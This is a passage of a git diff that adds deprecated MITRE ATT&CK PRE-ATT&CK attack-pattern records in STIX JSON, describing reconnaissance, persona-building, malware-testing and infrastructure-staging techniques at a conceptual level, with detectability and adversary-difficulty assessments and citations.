"x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3.json new file mode 100644 index 0000000000000000000000000000000000000000..4eafcf5d124d124f870c61cfd849056b8f8f2851 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--8945758e-f5e0-4e1d-9cfd-fe0a81215fed", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify security defensive capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1263).\n\nSecurity defensive capabilities are designed to stop or limit unauthorized network traffic or other types of accesses. (Citation: OSFingerprinting2014) (Citation: NMAP WAF NSE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1263", + "external_id": "T1263" + }, + { + "source_name": "OSFingerprinting2014", + "description": "InfoSec Institute. (2014, June 19). What You Must Know About OS Fingerprinting. Retrieved March 1, 2017." + }, + { + "source_name": "NMAP WAF NSE", + "description": "Paulino Calderon. (n.d.). http-waf-detect. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Technically, the defender has the ability to detect. However, this is typically not performed as this type of traffic would likely not prompt the defender to take any actionable defense. 
In addition, this would require the defender to closely review their access logs for any suspicious activity (if the activity is even logged).", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "The adversary will have some insight into defenses based on dropped traffic or filtered responses. It is more difficult to pinpoint which defenses are implemented (e.g., [https://www.fireeye.com FireEye] WMPS, [https://www.hpe.com Hewlett Packard Enterprise] Tipping Point IPS).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1040", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6.json new file mode 100644 index 0000000000000000000000000000000000000000..b10245440d8d2821feb0c932c3890697cd7e91e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--f8fa734f-50c1-4584-bdcb-c77ccdd741e9", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test callback functionality", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1356).\n\nCallbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1356", + "external_id": "T1356" + }, + { + "source_name": "LeeBeaconing", + "description": "Tony Lee. (2012, December 11). Testing Your Defenses - Beaconing. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the test and defender likely has no visibility.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary controls or acquires all pieces of infrastructure and can test outside of defender's visibility.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1133", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1.json new file mode 100644 index 0000000000000000000000000000000000000000..525e38f98e006ff1cedff4ca2b68e066e220fc9a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--072a9967-6e11-402d-9426-ac792ecb4bbd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify job postings and needs/gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1267).\n\nJob postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1267", + "external_id": "T1267" + }, + { + "source_name": "JobPostingThreat", + "description": "Jay D. Krasnow. (2000, October). The Competitive Intelligence and National Security Threat from Website Job Listings. Retrieved March 16, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1044", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc.json new file mode 100644 index 0000000000000000000000000000000000000000..2a578d1f4bed097d1b377b9797becc914154668d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--ba75ac32-4057-47d5-b2ca-084034df1c06", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze organizational skillsets and deficiencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1289).\n\nAnalyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1289", + "external_id": "T1289" + }, + { + "source_name": "FakeLinkedIn", + "description": "LIFARS. (2015, October 8). Hackers Fake LinkedIn Profiles to Scout Targets. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Job postings and hiring requisitions have to be made public for contractors and many times have the name of the organization being supported. 
In addition, they outline the skills needed to do a particular job, which can provide insight into the technical structure and organization of a target.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1066", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624.json new file mode 100644 index 0000000000000000000000000000000000000000..e424264ac01f5e2a217928546ae97457f5f8066e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--cc716cb4-3d47-4c4a-abb4-919ff8006658", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify people of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1269).\n\nThe attempt to identify people of interest or with an inherent weakness for direct or indirect targeting to determine an approach to compromise a person or organization. Such targets may include individuals with poor OPSEC practices or those who have a trusted relationship with the intended target. (Citation: RSA-APTRecon) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1269", + "external_id": "T1269" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Common defenses protecting against poor OPSEC practices are traditionally more policy-based in nature rather than technical. 
Policy-based mitigations are generally more difficult to enforce and track violations, making it more difficult that this technique can be detected by common defenses.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Specialty cases enable an adversary to use key words in order to search social media and identify personnel with poor OPSEC practices who may have access to specialized information which would make them a target of interest. In addition, the open nature of social media leads to a tendency among individuals to overshare, encouraging poor OPSEC and increasing the ease by which an adversary can identify interesting targets.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1046", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6.json new file mode 100644 index 0000000000000000000000000000000000000000..ce9aa1315712bbbccb768c80764d5a851658a472 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--ac1fb54e-10f0-4921-a591-fe3c06db82cd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Common, high volume protocols and software", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1321).\n\nCertain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary's traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1321", + "external_id": "T1321" + }, + { + "source_name": "symantecNITRO", + "description": "Eric Chien and Gavin O\u2019Gorman. (n.d.). The Nitro Attacks: Stealing Secrets from the Chemical Industry. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "High level of entropy in communications. 
High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to decipher or to make the communication less conspicuous.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1098", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0.json new file mode 100644 index 0000000000000000000000000000000000000000..f3809e874e304e262ede363ccc88ed949a494a95 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--13b64ed4-6068-4b26-99c2-2f7afef7ccd1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Replace legitimate binary with malware", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nReplacing a legitimate binary with malware can be accomplished either by replacing a binary on a legitimate download site or standing up a fake or alternative site with the malicious binary. The intent is to have a user download and run the malicious binary thereby executing malware. (Citation: FSecureICS)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1378", + "url": "https://attack.mitre.org/techniques/T1378" + }, + { + "description": "Daavid and Antti. (2014, June 23). Havex Hunts For ICS/SCADA Systems. Retrieved March 9, 2017.", + "source_name": "FSecureICS" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:23:46.977Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1155", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Requires the adversary to replace a binary on a website where users will download the binary (e.g., patch, firmware update, software application) as innately trusted. 
The additional challenge is the reduced set of vendor-trusted websites that are vulnerable.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "On the host end user system, integrity checking (e.g., hash verification, code signing enforcement), application whitelisting, sandboxing, or behavioral-based/heuristic-based systems are most likely to be successful in detecting this technique. On the source webserver, detecting binary changes is easy to detect if performed.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729.json new file mode 100644 index 0000000000000000000000000000000000000000..355e64faf691dd7c459300f3318a272f5fc569e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--51596030-6bde-4517-9a5b-c55423b63f59", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Automated system performs requested action", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nUsers may be performing legitimate activity but using media that is compromised (e.g., using a USB drive that comes with malware installed during manufacture or supply). Upon insertion in the system the media auto-runs and the malware executes without further action by the user. (Citation: WSUSpect2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1384", + "url": "https://attack.mitre.org/techniques/T1384" + }, + { + "description": "Paul Stone & Alex Chapman. (2015, August 5). WSUSpect: Compromising the Windows Enterprise via Windows Update. Retrieved March 1, 2017.", + "source_name": "WSUSpect2015" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:15:05.089Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1161", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Autoruns with USB keys and CDs traditionally were always on (e.g., [http://windows.microsoft.com Windows] 7 is now an exception with a new policy of limiting the always on nature of Autoruns), ensuring and automated system completes a requested action. 
Specialized use cases exist where automated systems are specifically designed against automatically performing certain actions (e.g., USB/CD insertion and automatically running is disabled in certain environments).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Environments without extensive endpoint sensing capabilities do not typically collect this level of detailed information.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb.json new file mode 100644 index 0000000000000000000000000000000000000000..dfec789ed25db0ce72af496953ab9b65eef9b41c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--ff4cc189-a1fc-47e5-a2ce-f2417129775f", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify analyst level gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1233).\n\nAnalysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1233", + "external_id": "T1233" + }, + { + "source_name": "BrighthubGapAnalysis", + "description": "Ronda Bowen. (2014, March 26). Performing a Gap Analysis: Where Do You Begin?. Retrieved March 14, 2017." + }, + { + "source_name": "ICD115", + "description": "Office of the Director of National Intelligence. (2012, December 21). ICD 115: Intelligence Community Capability Requirements Process. Retrieved March 2, 2017." + }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. 
Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1010", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33.json new file mode 100644 index 0000000000000000000000000000000000000000..63110d749b1269c8e71f13af639746a666f34fe1 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--337bd8a7-ffc9-4e1b-88bc-aeb956a4179c", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Friend/Follow/Connect to targets of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1344).\n\nOnce a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1344", + "external_id": "T1344" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. 
Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1121", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "The nature of social media is such that the adversary naturally connects to a target of interest without suspicion, given the purpose of the platform is to promote connections between individuals. Performing activities like typical users, but with specific intent in mind.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf.json new file mode 100644 index 0000000000000000000000000000000000000000..1dcbf738cb9fcb7bb697bfe2d17b30fbec1ef4b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--71c8d914-aacd-4248-9787-b81d81381579", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Port redirector", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1363).\n\nRedirecting a communication request from one address and port number combination to another. May be set up to obfuscate the final location of communications that will occur in later stages of an attack. (Citation: SecureWorks HTRAN Analysis)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1363", + "external_id": "T1363" + }, + { + "source_name": "SecureWorks HTRAN Analysis", + "description": "JOE STEWART. (2011, August 3). HTran and the Advanced Persistent Threat. Retrieved March 28, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS providers).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1140", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904.json new file mode 100644 index 0000000000000000000000000000000000000000..7fce1529b9f4ef0487ceaf22f28a18544dd7e995 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--fd3fea9b-ce2c-42e8-9ef4-3e750930cc13", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Derive intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1230).\n\nLeadership or key decision makers may derive specific intelligence requirements from Key Intelligence Topics (KITs) or Key Intelligence Questions (KIQs). Specific intelligence requirements assist analysts in gathering information to establish a baseline of information about a topic or question and collection managers to clarify the types of information that should be collected to satisfy the requirement. (Citation: LowenthalCh4) (Citation: Heffter)", + "external_references": [ + { + "external_id": "T1230", + "url": "https://attack.mitre.org/techniques/T1230", + "source_name": "mitre-pre-attack" + }, + { + "description": "Mark M. Lowenthal. (n.d.). Ch 4: The Intelligence Process--A Macro Look; Who Does What for Whome?, Intelligence: From Secrets to Policy. Retrieved March 2, 2017.", + "source_name": "LowenthalCh4" + }, + { + "description": "Clyde R. Heffter. (2011, August 4). A 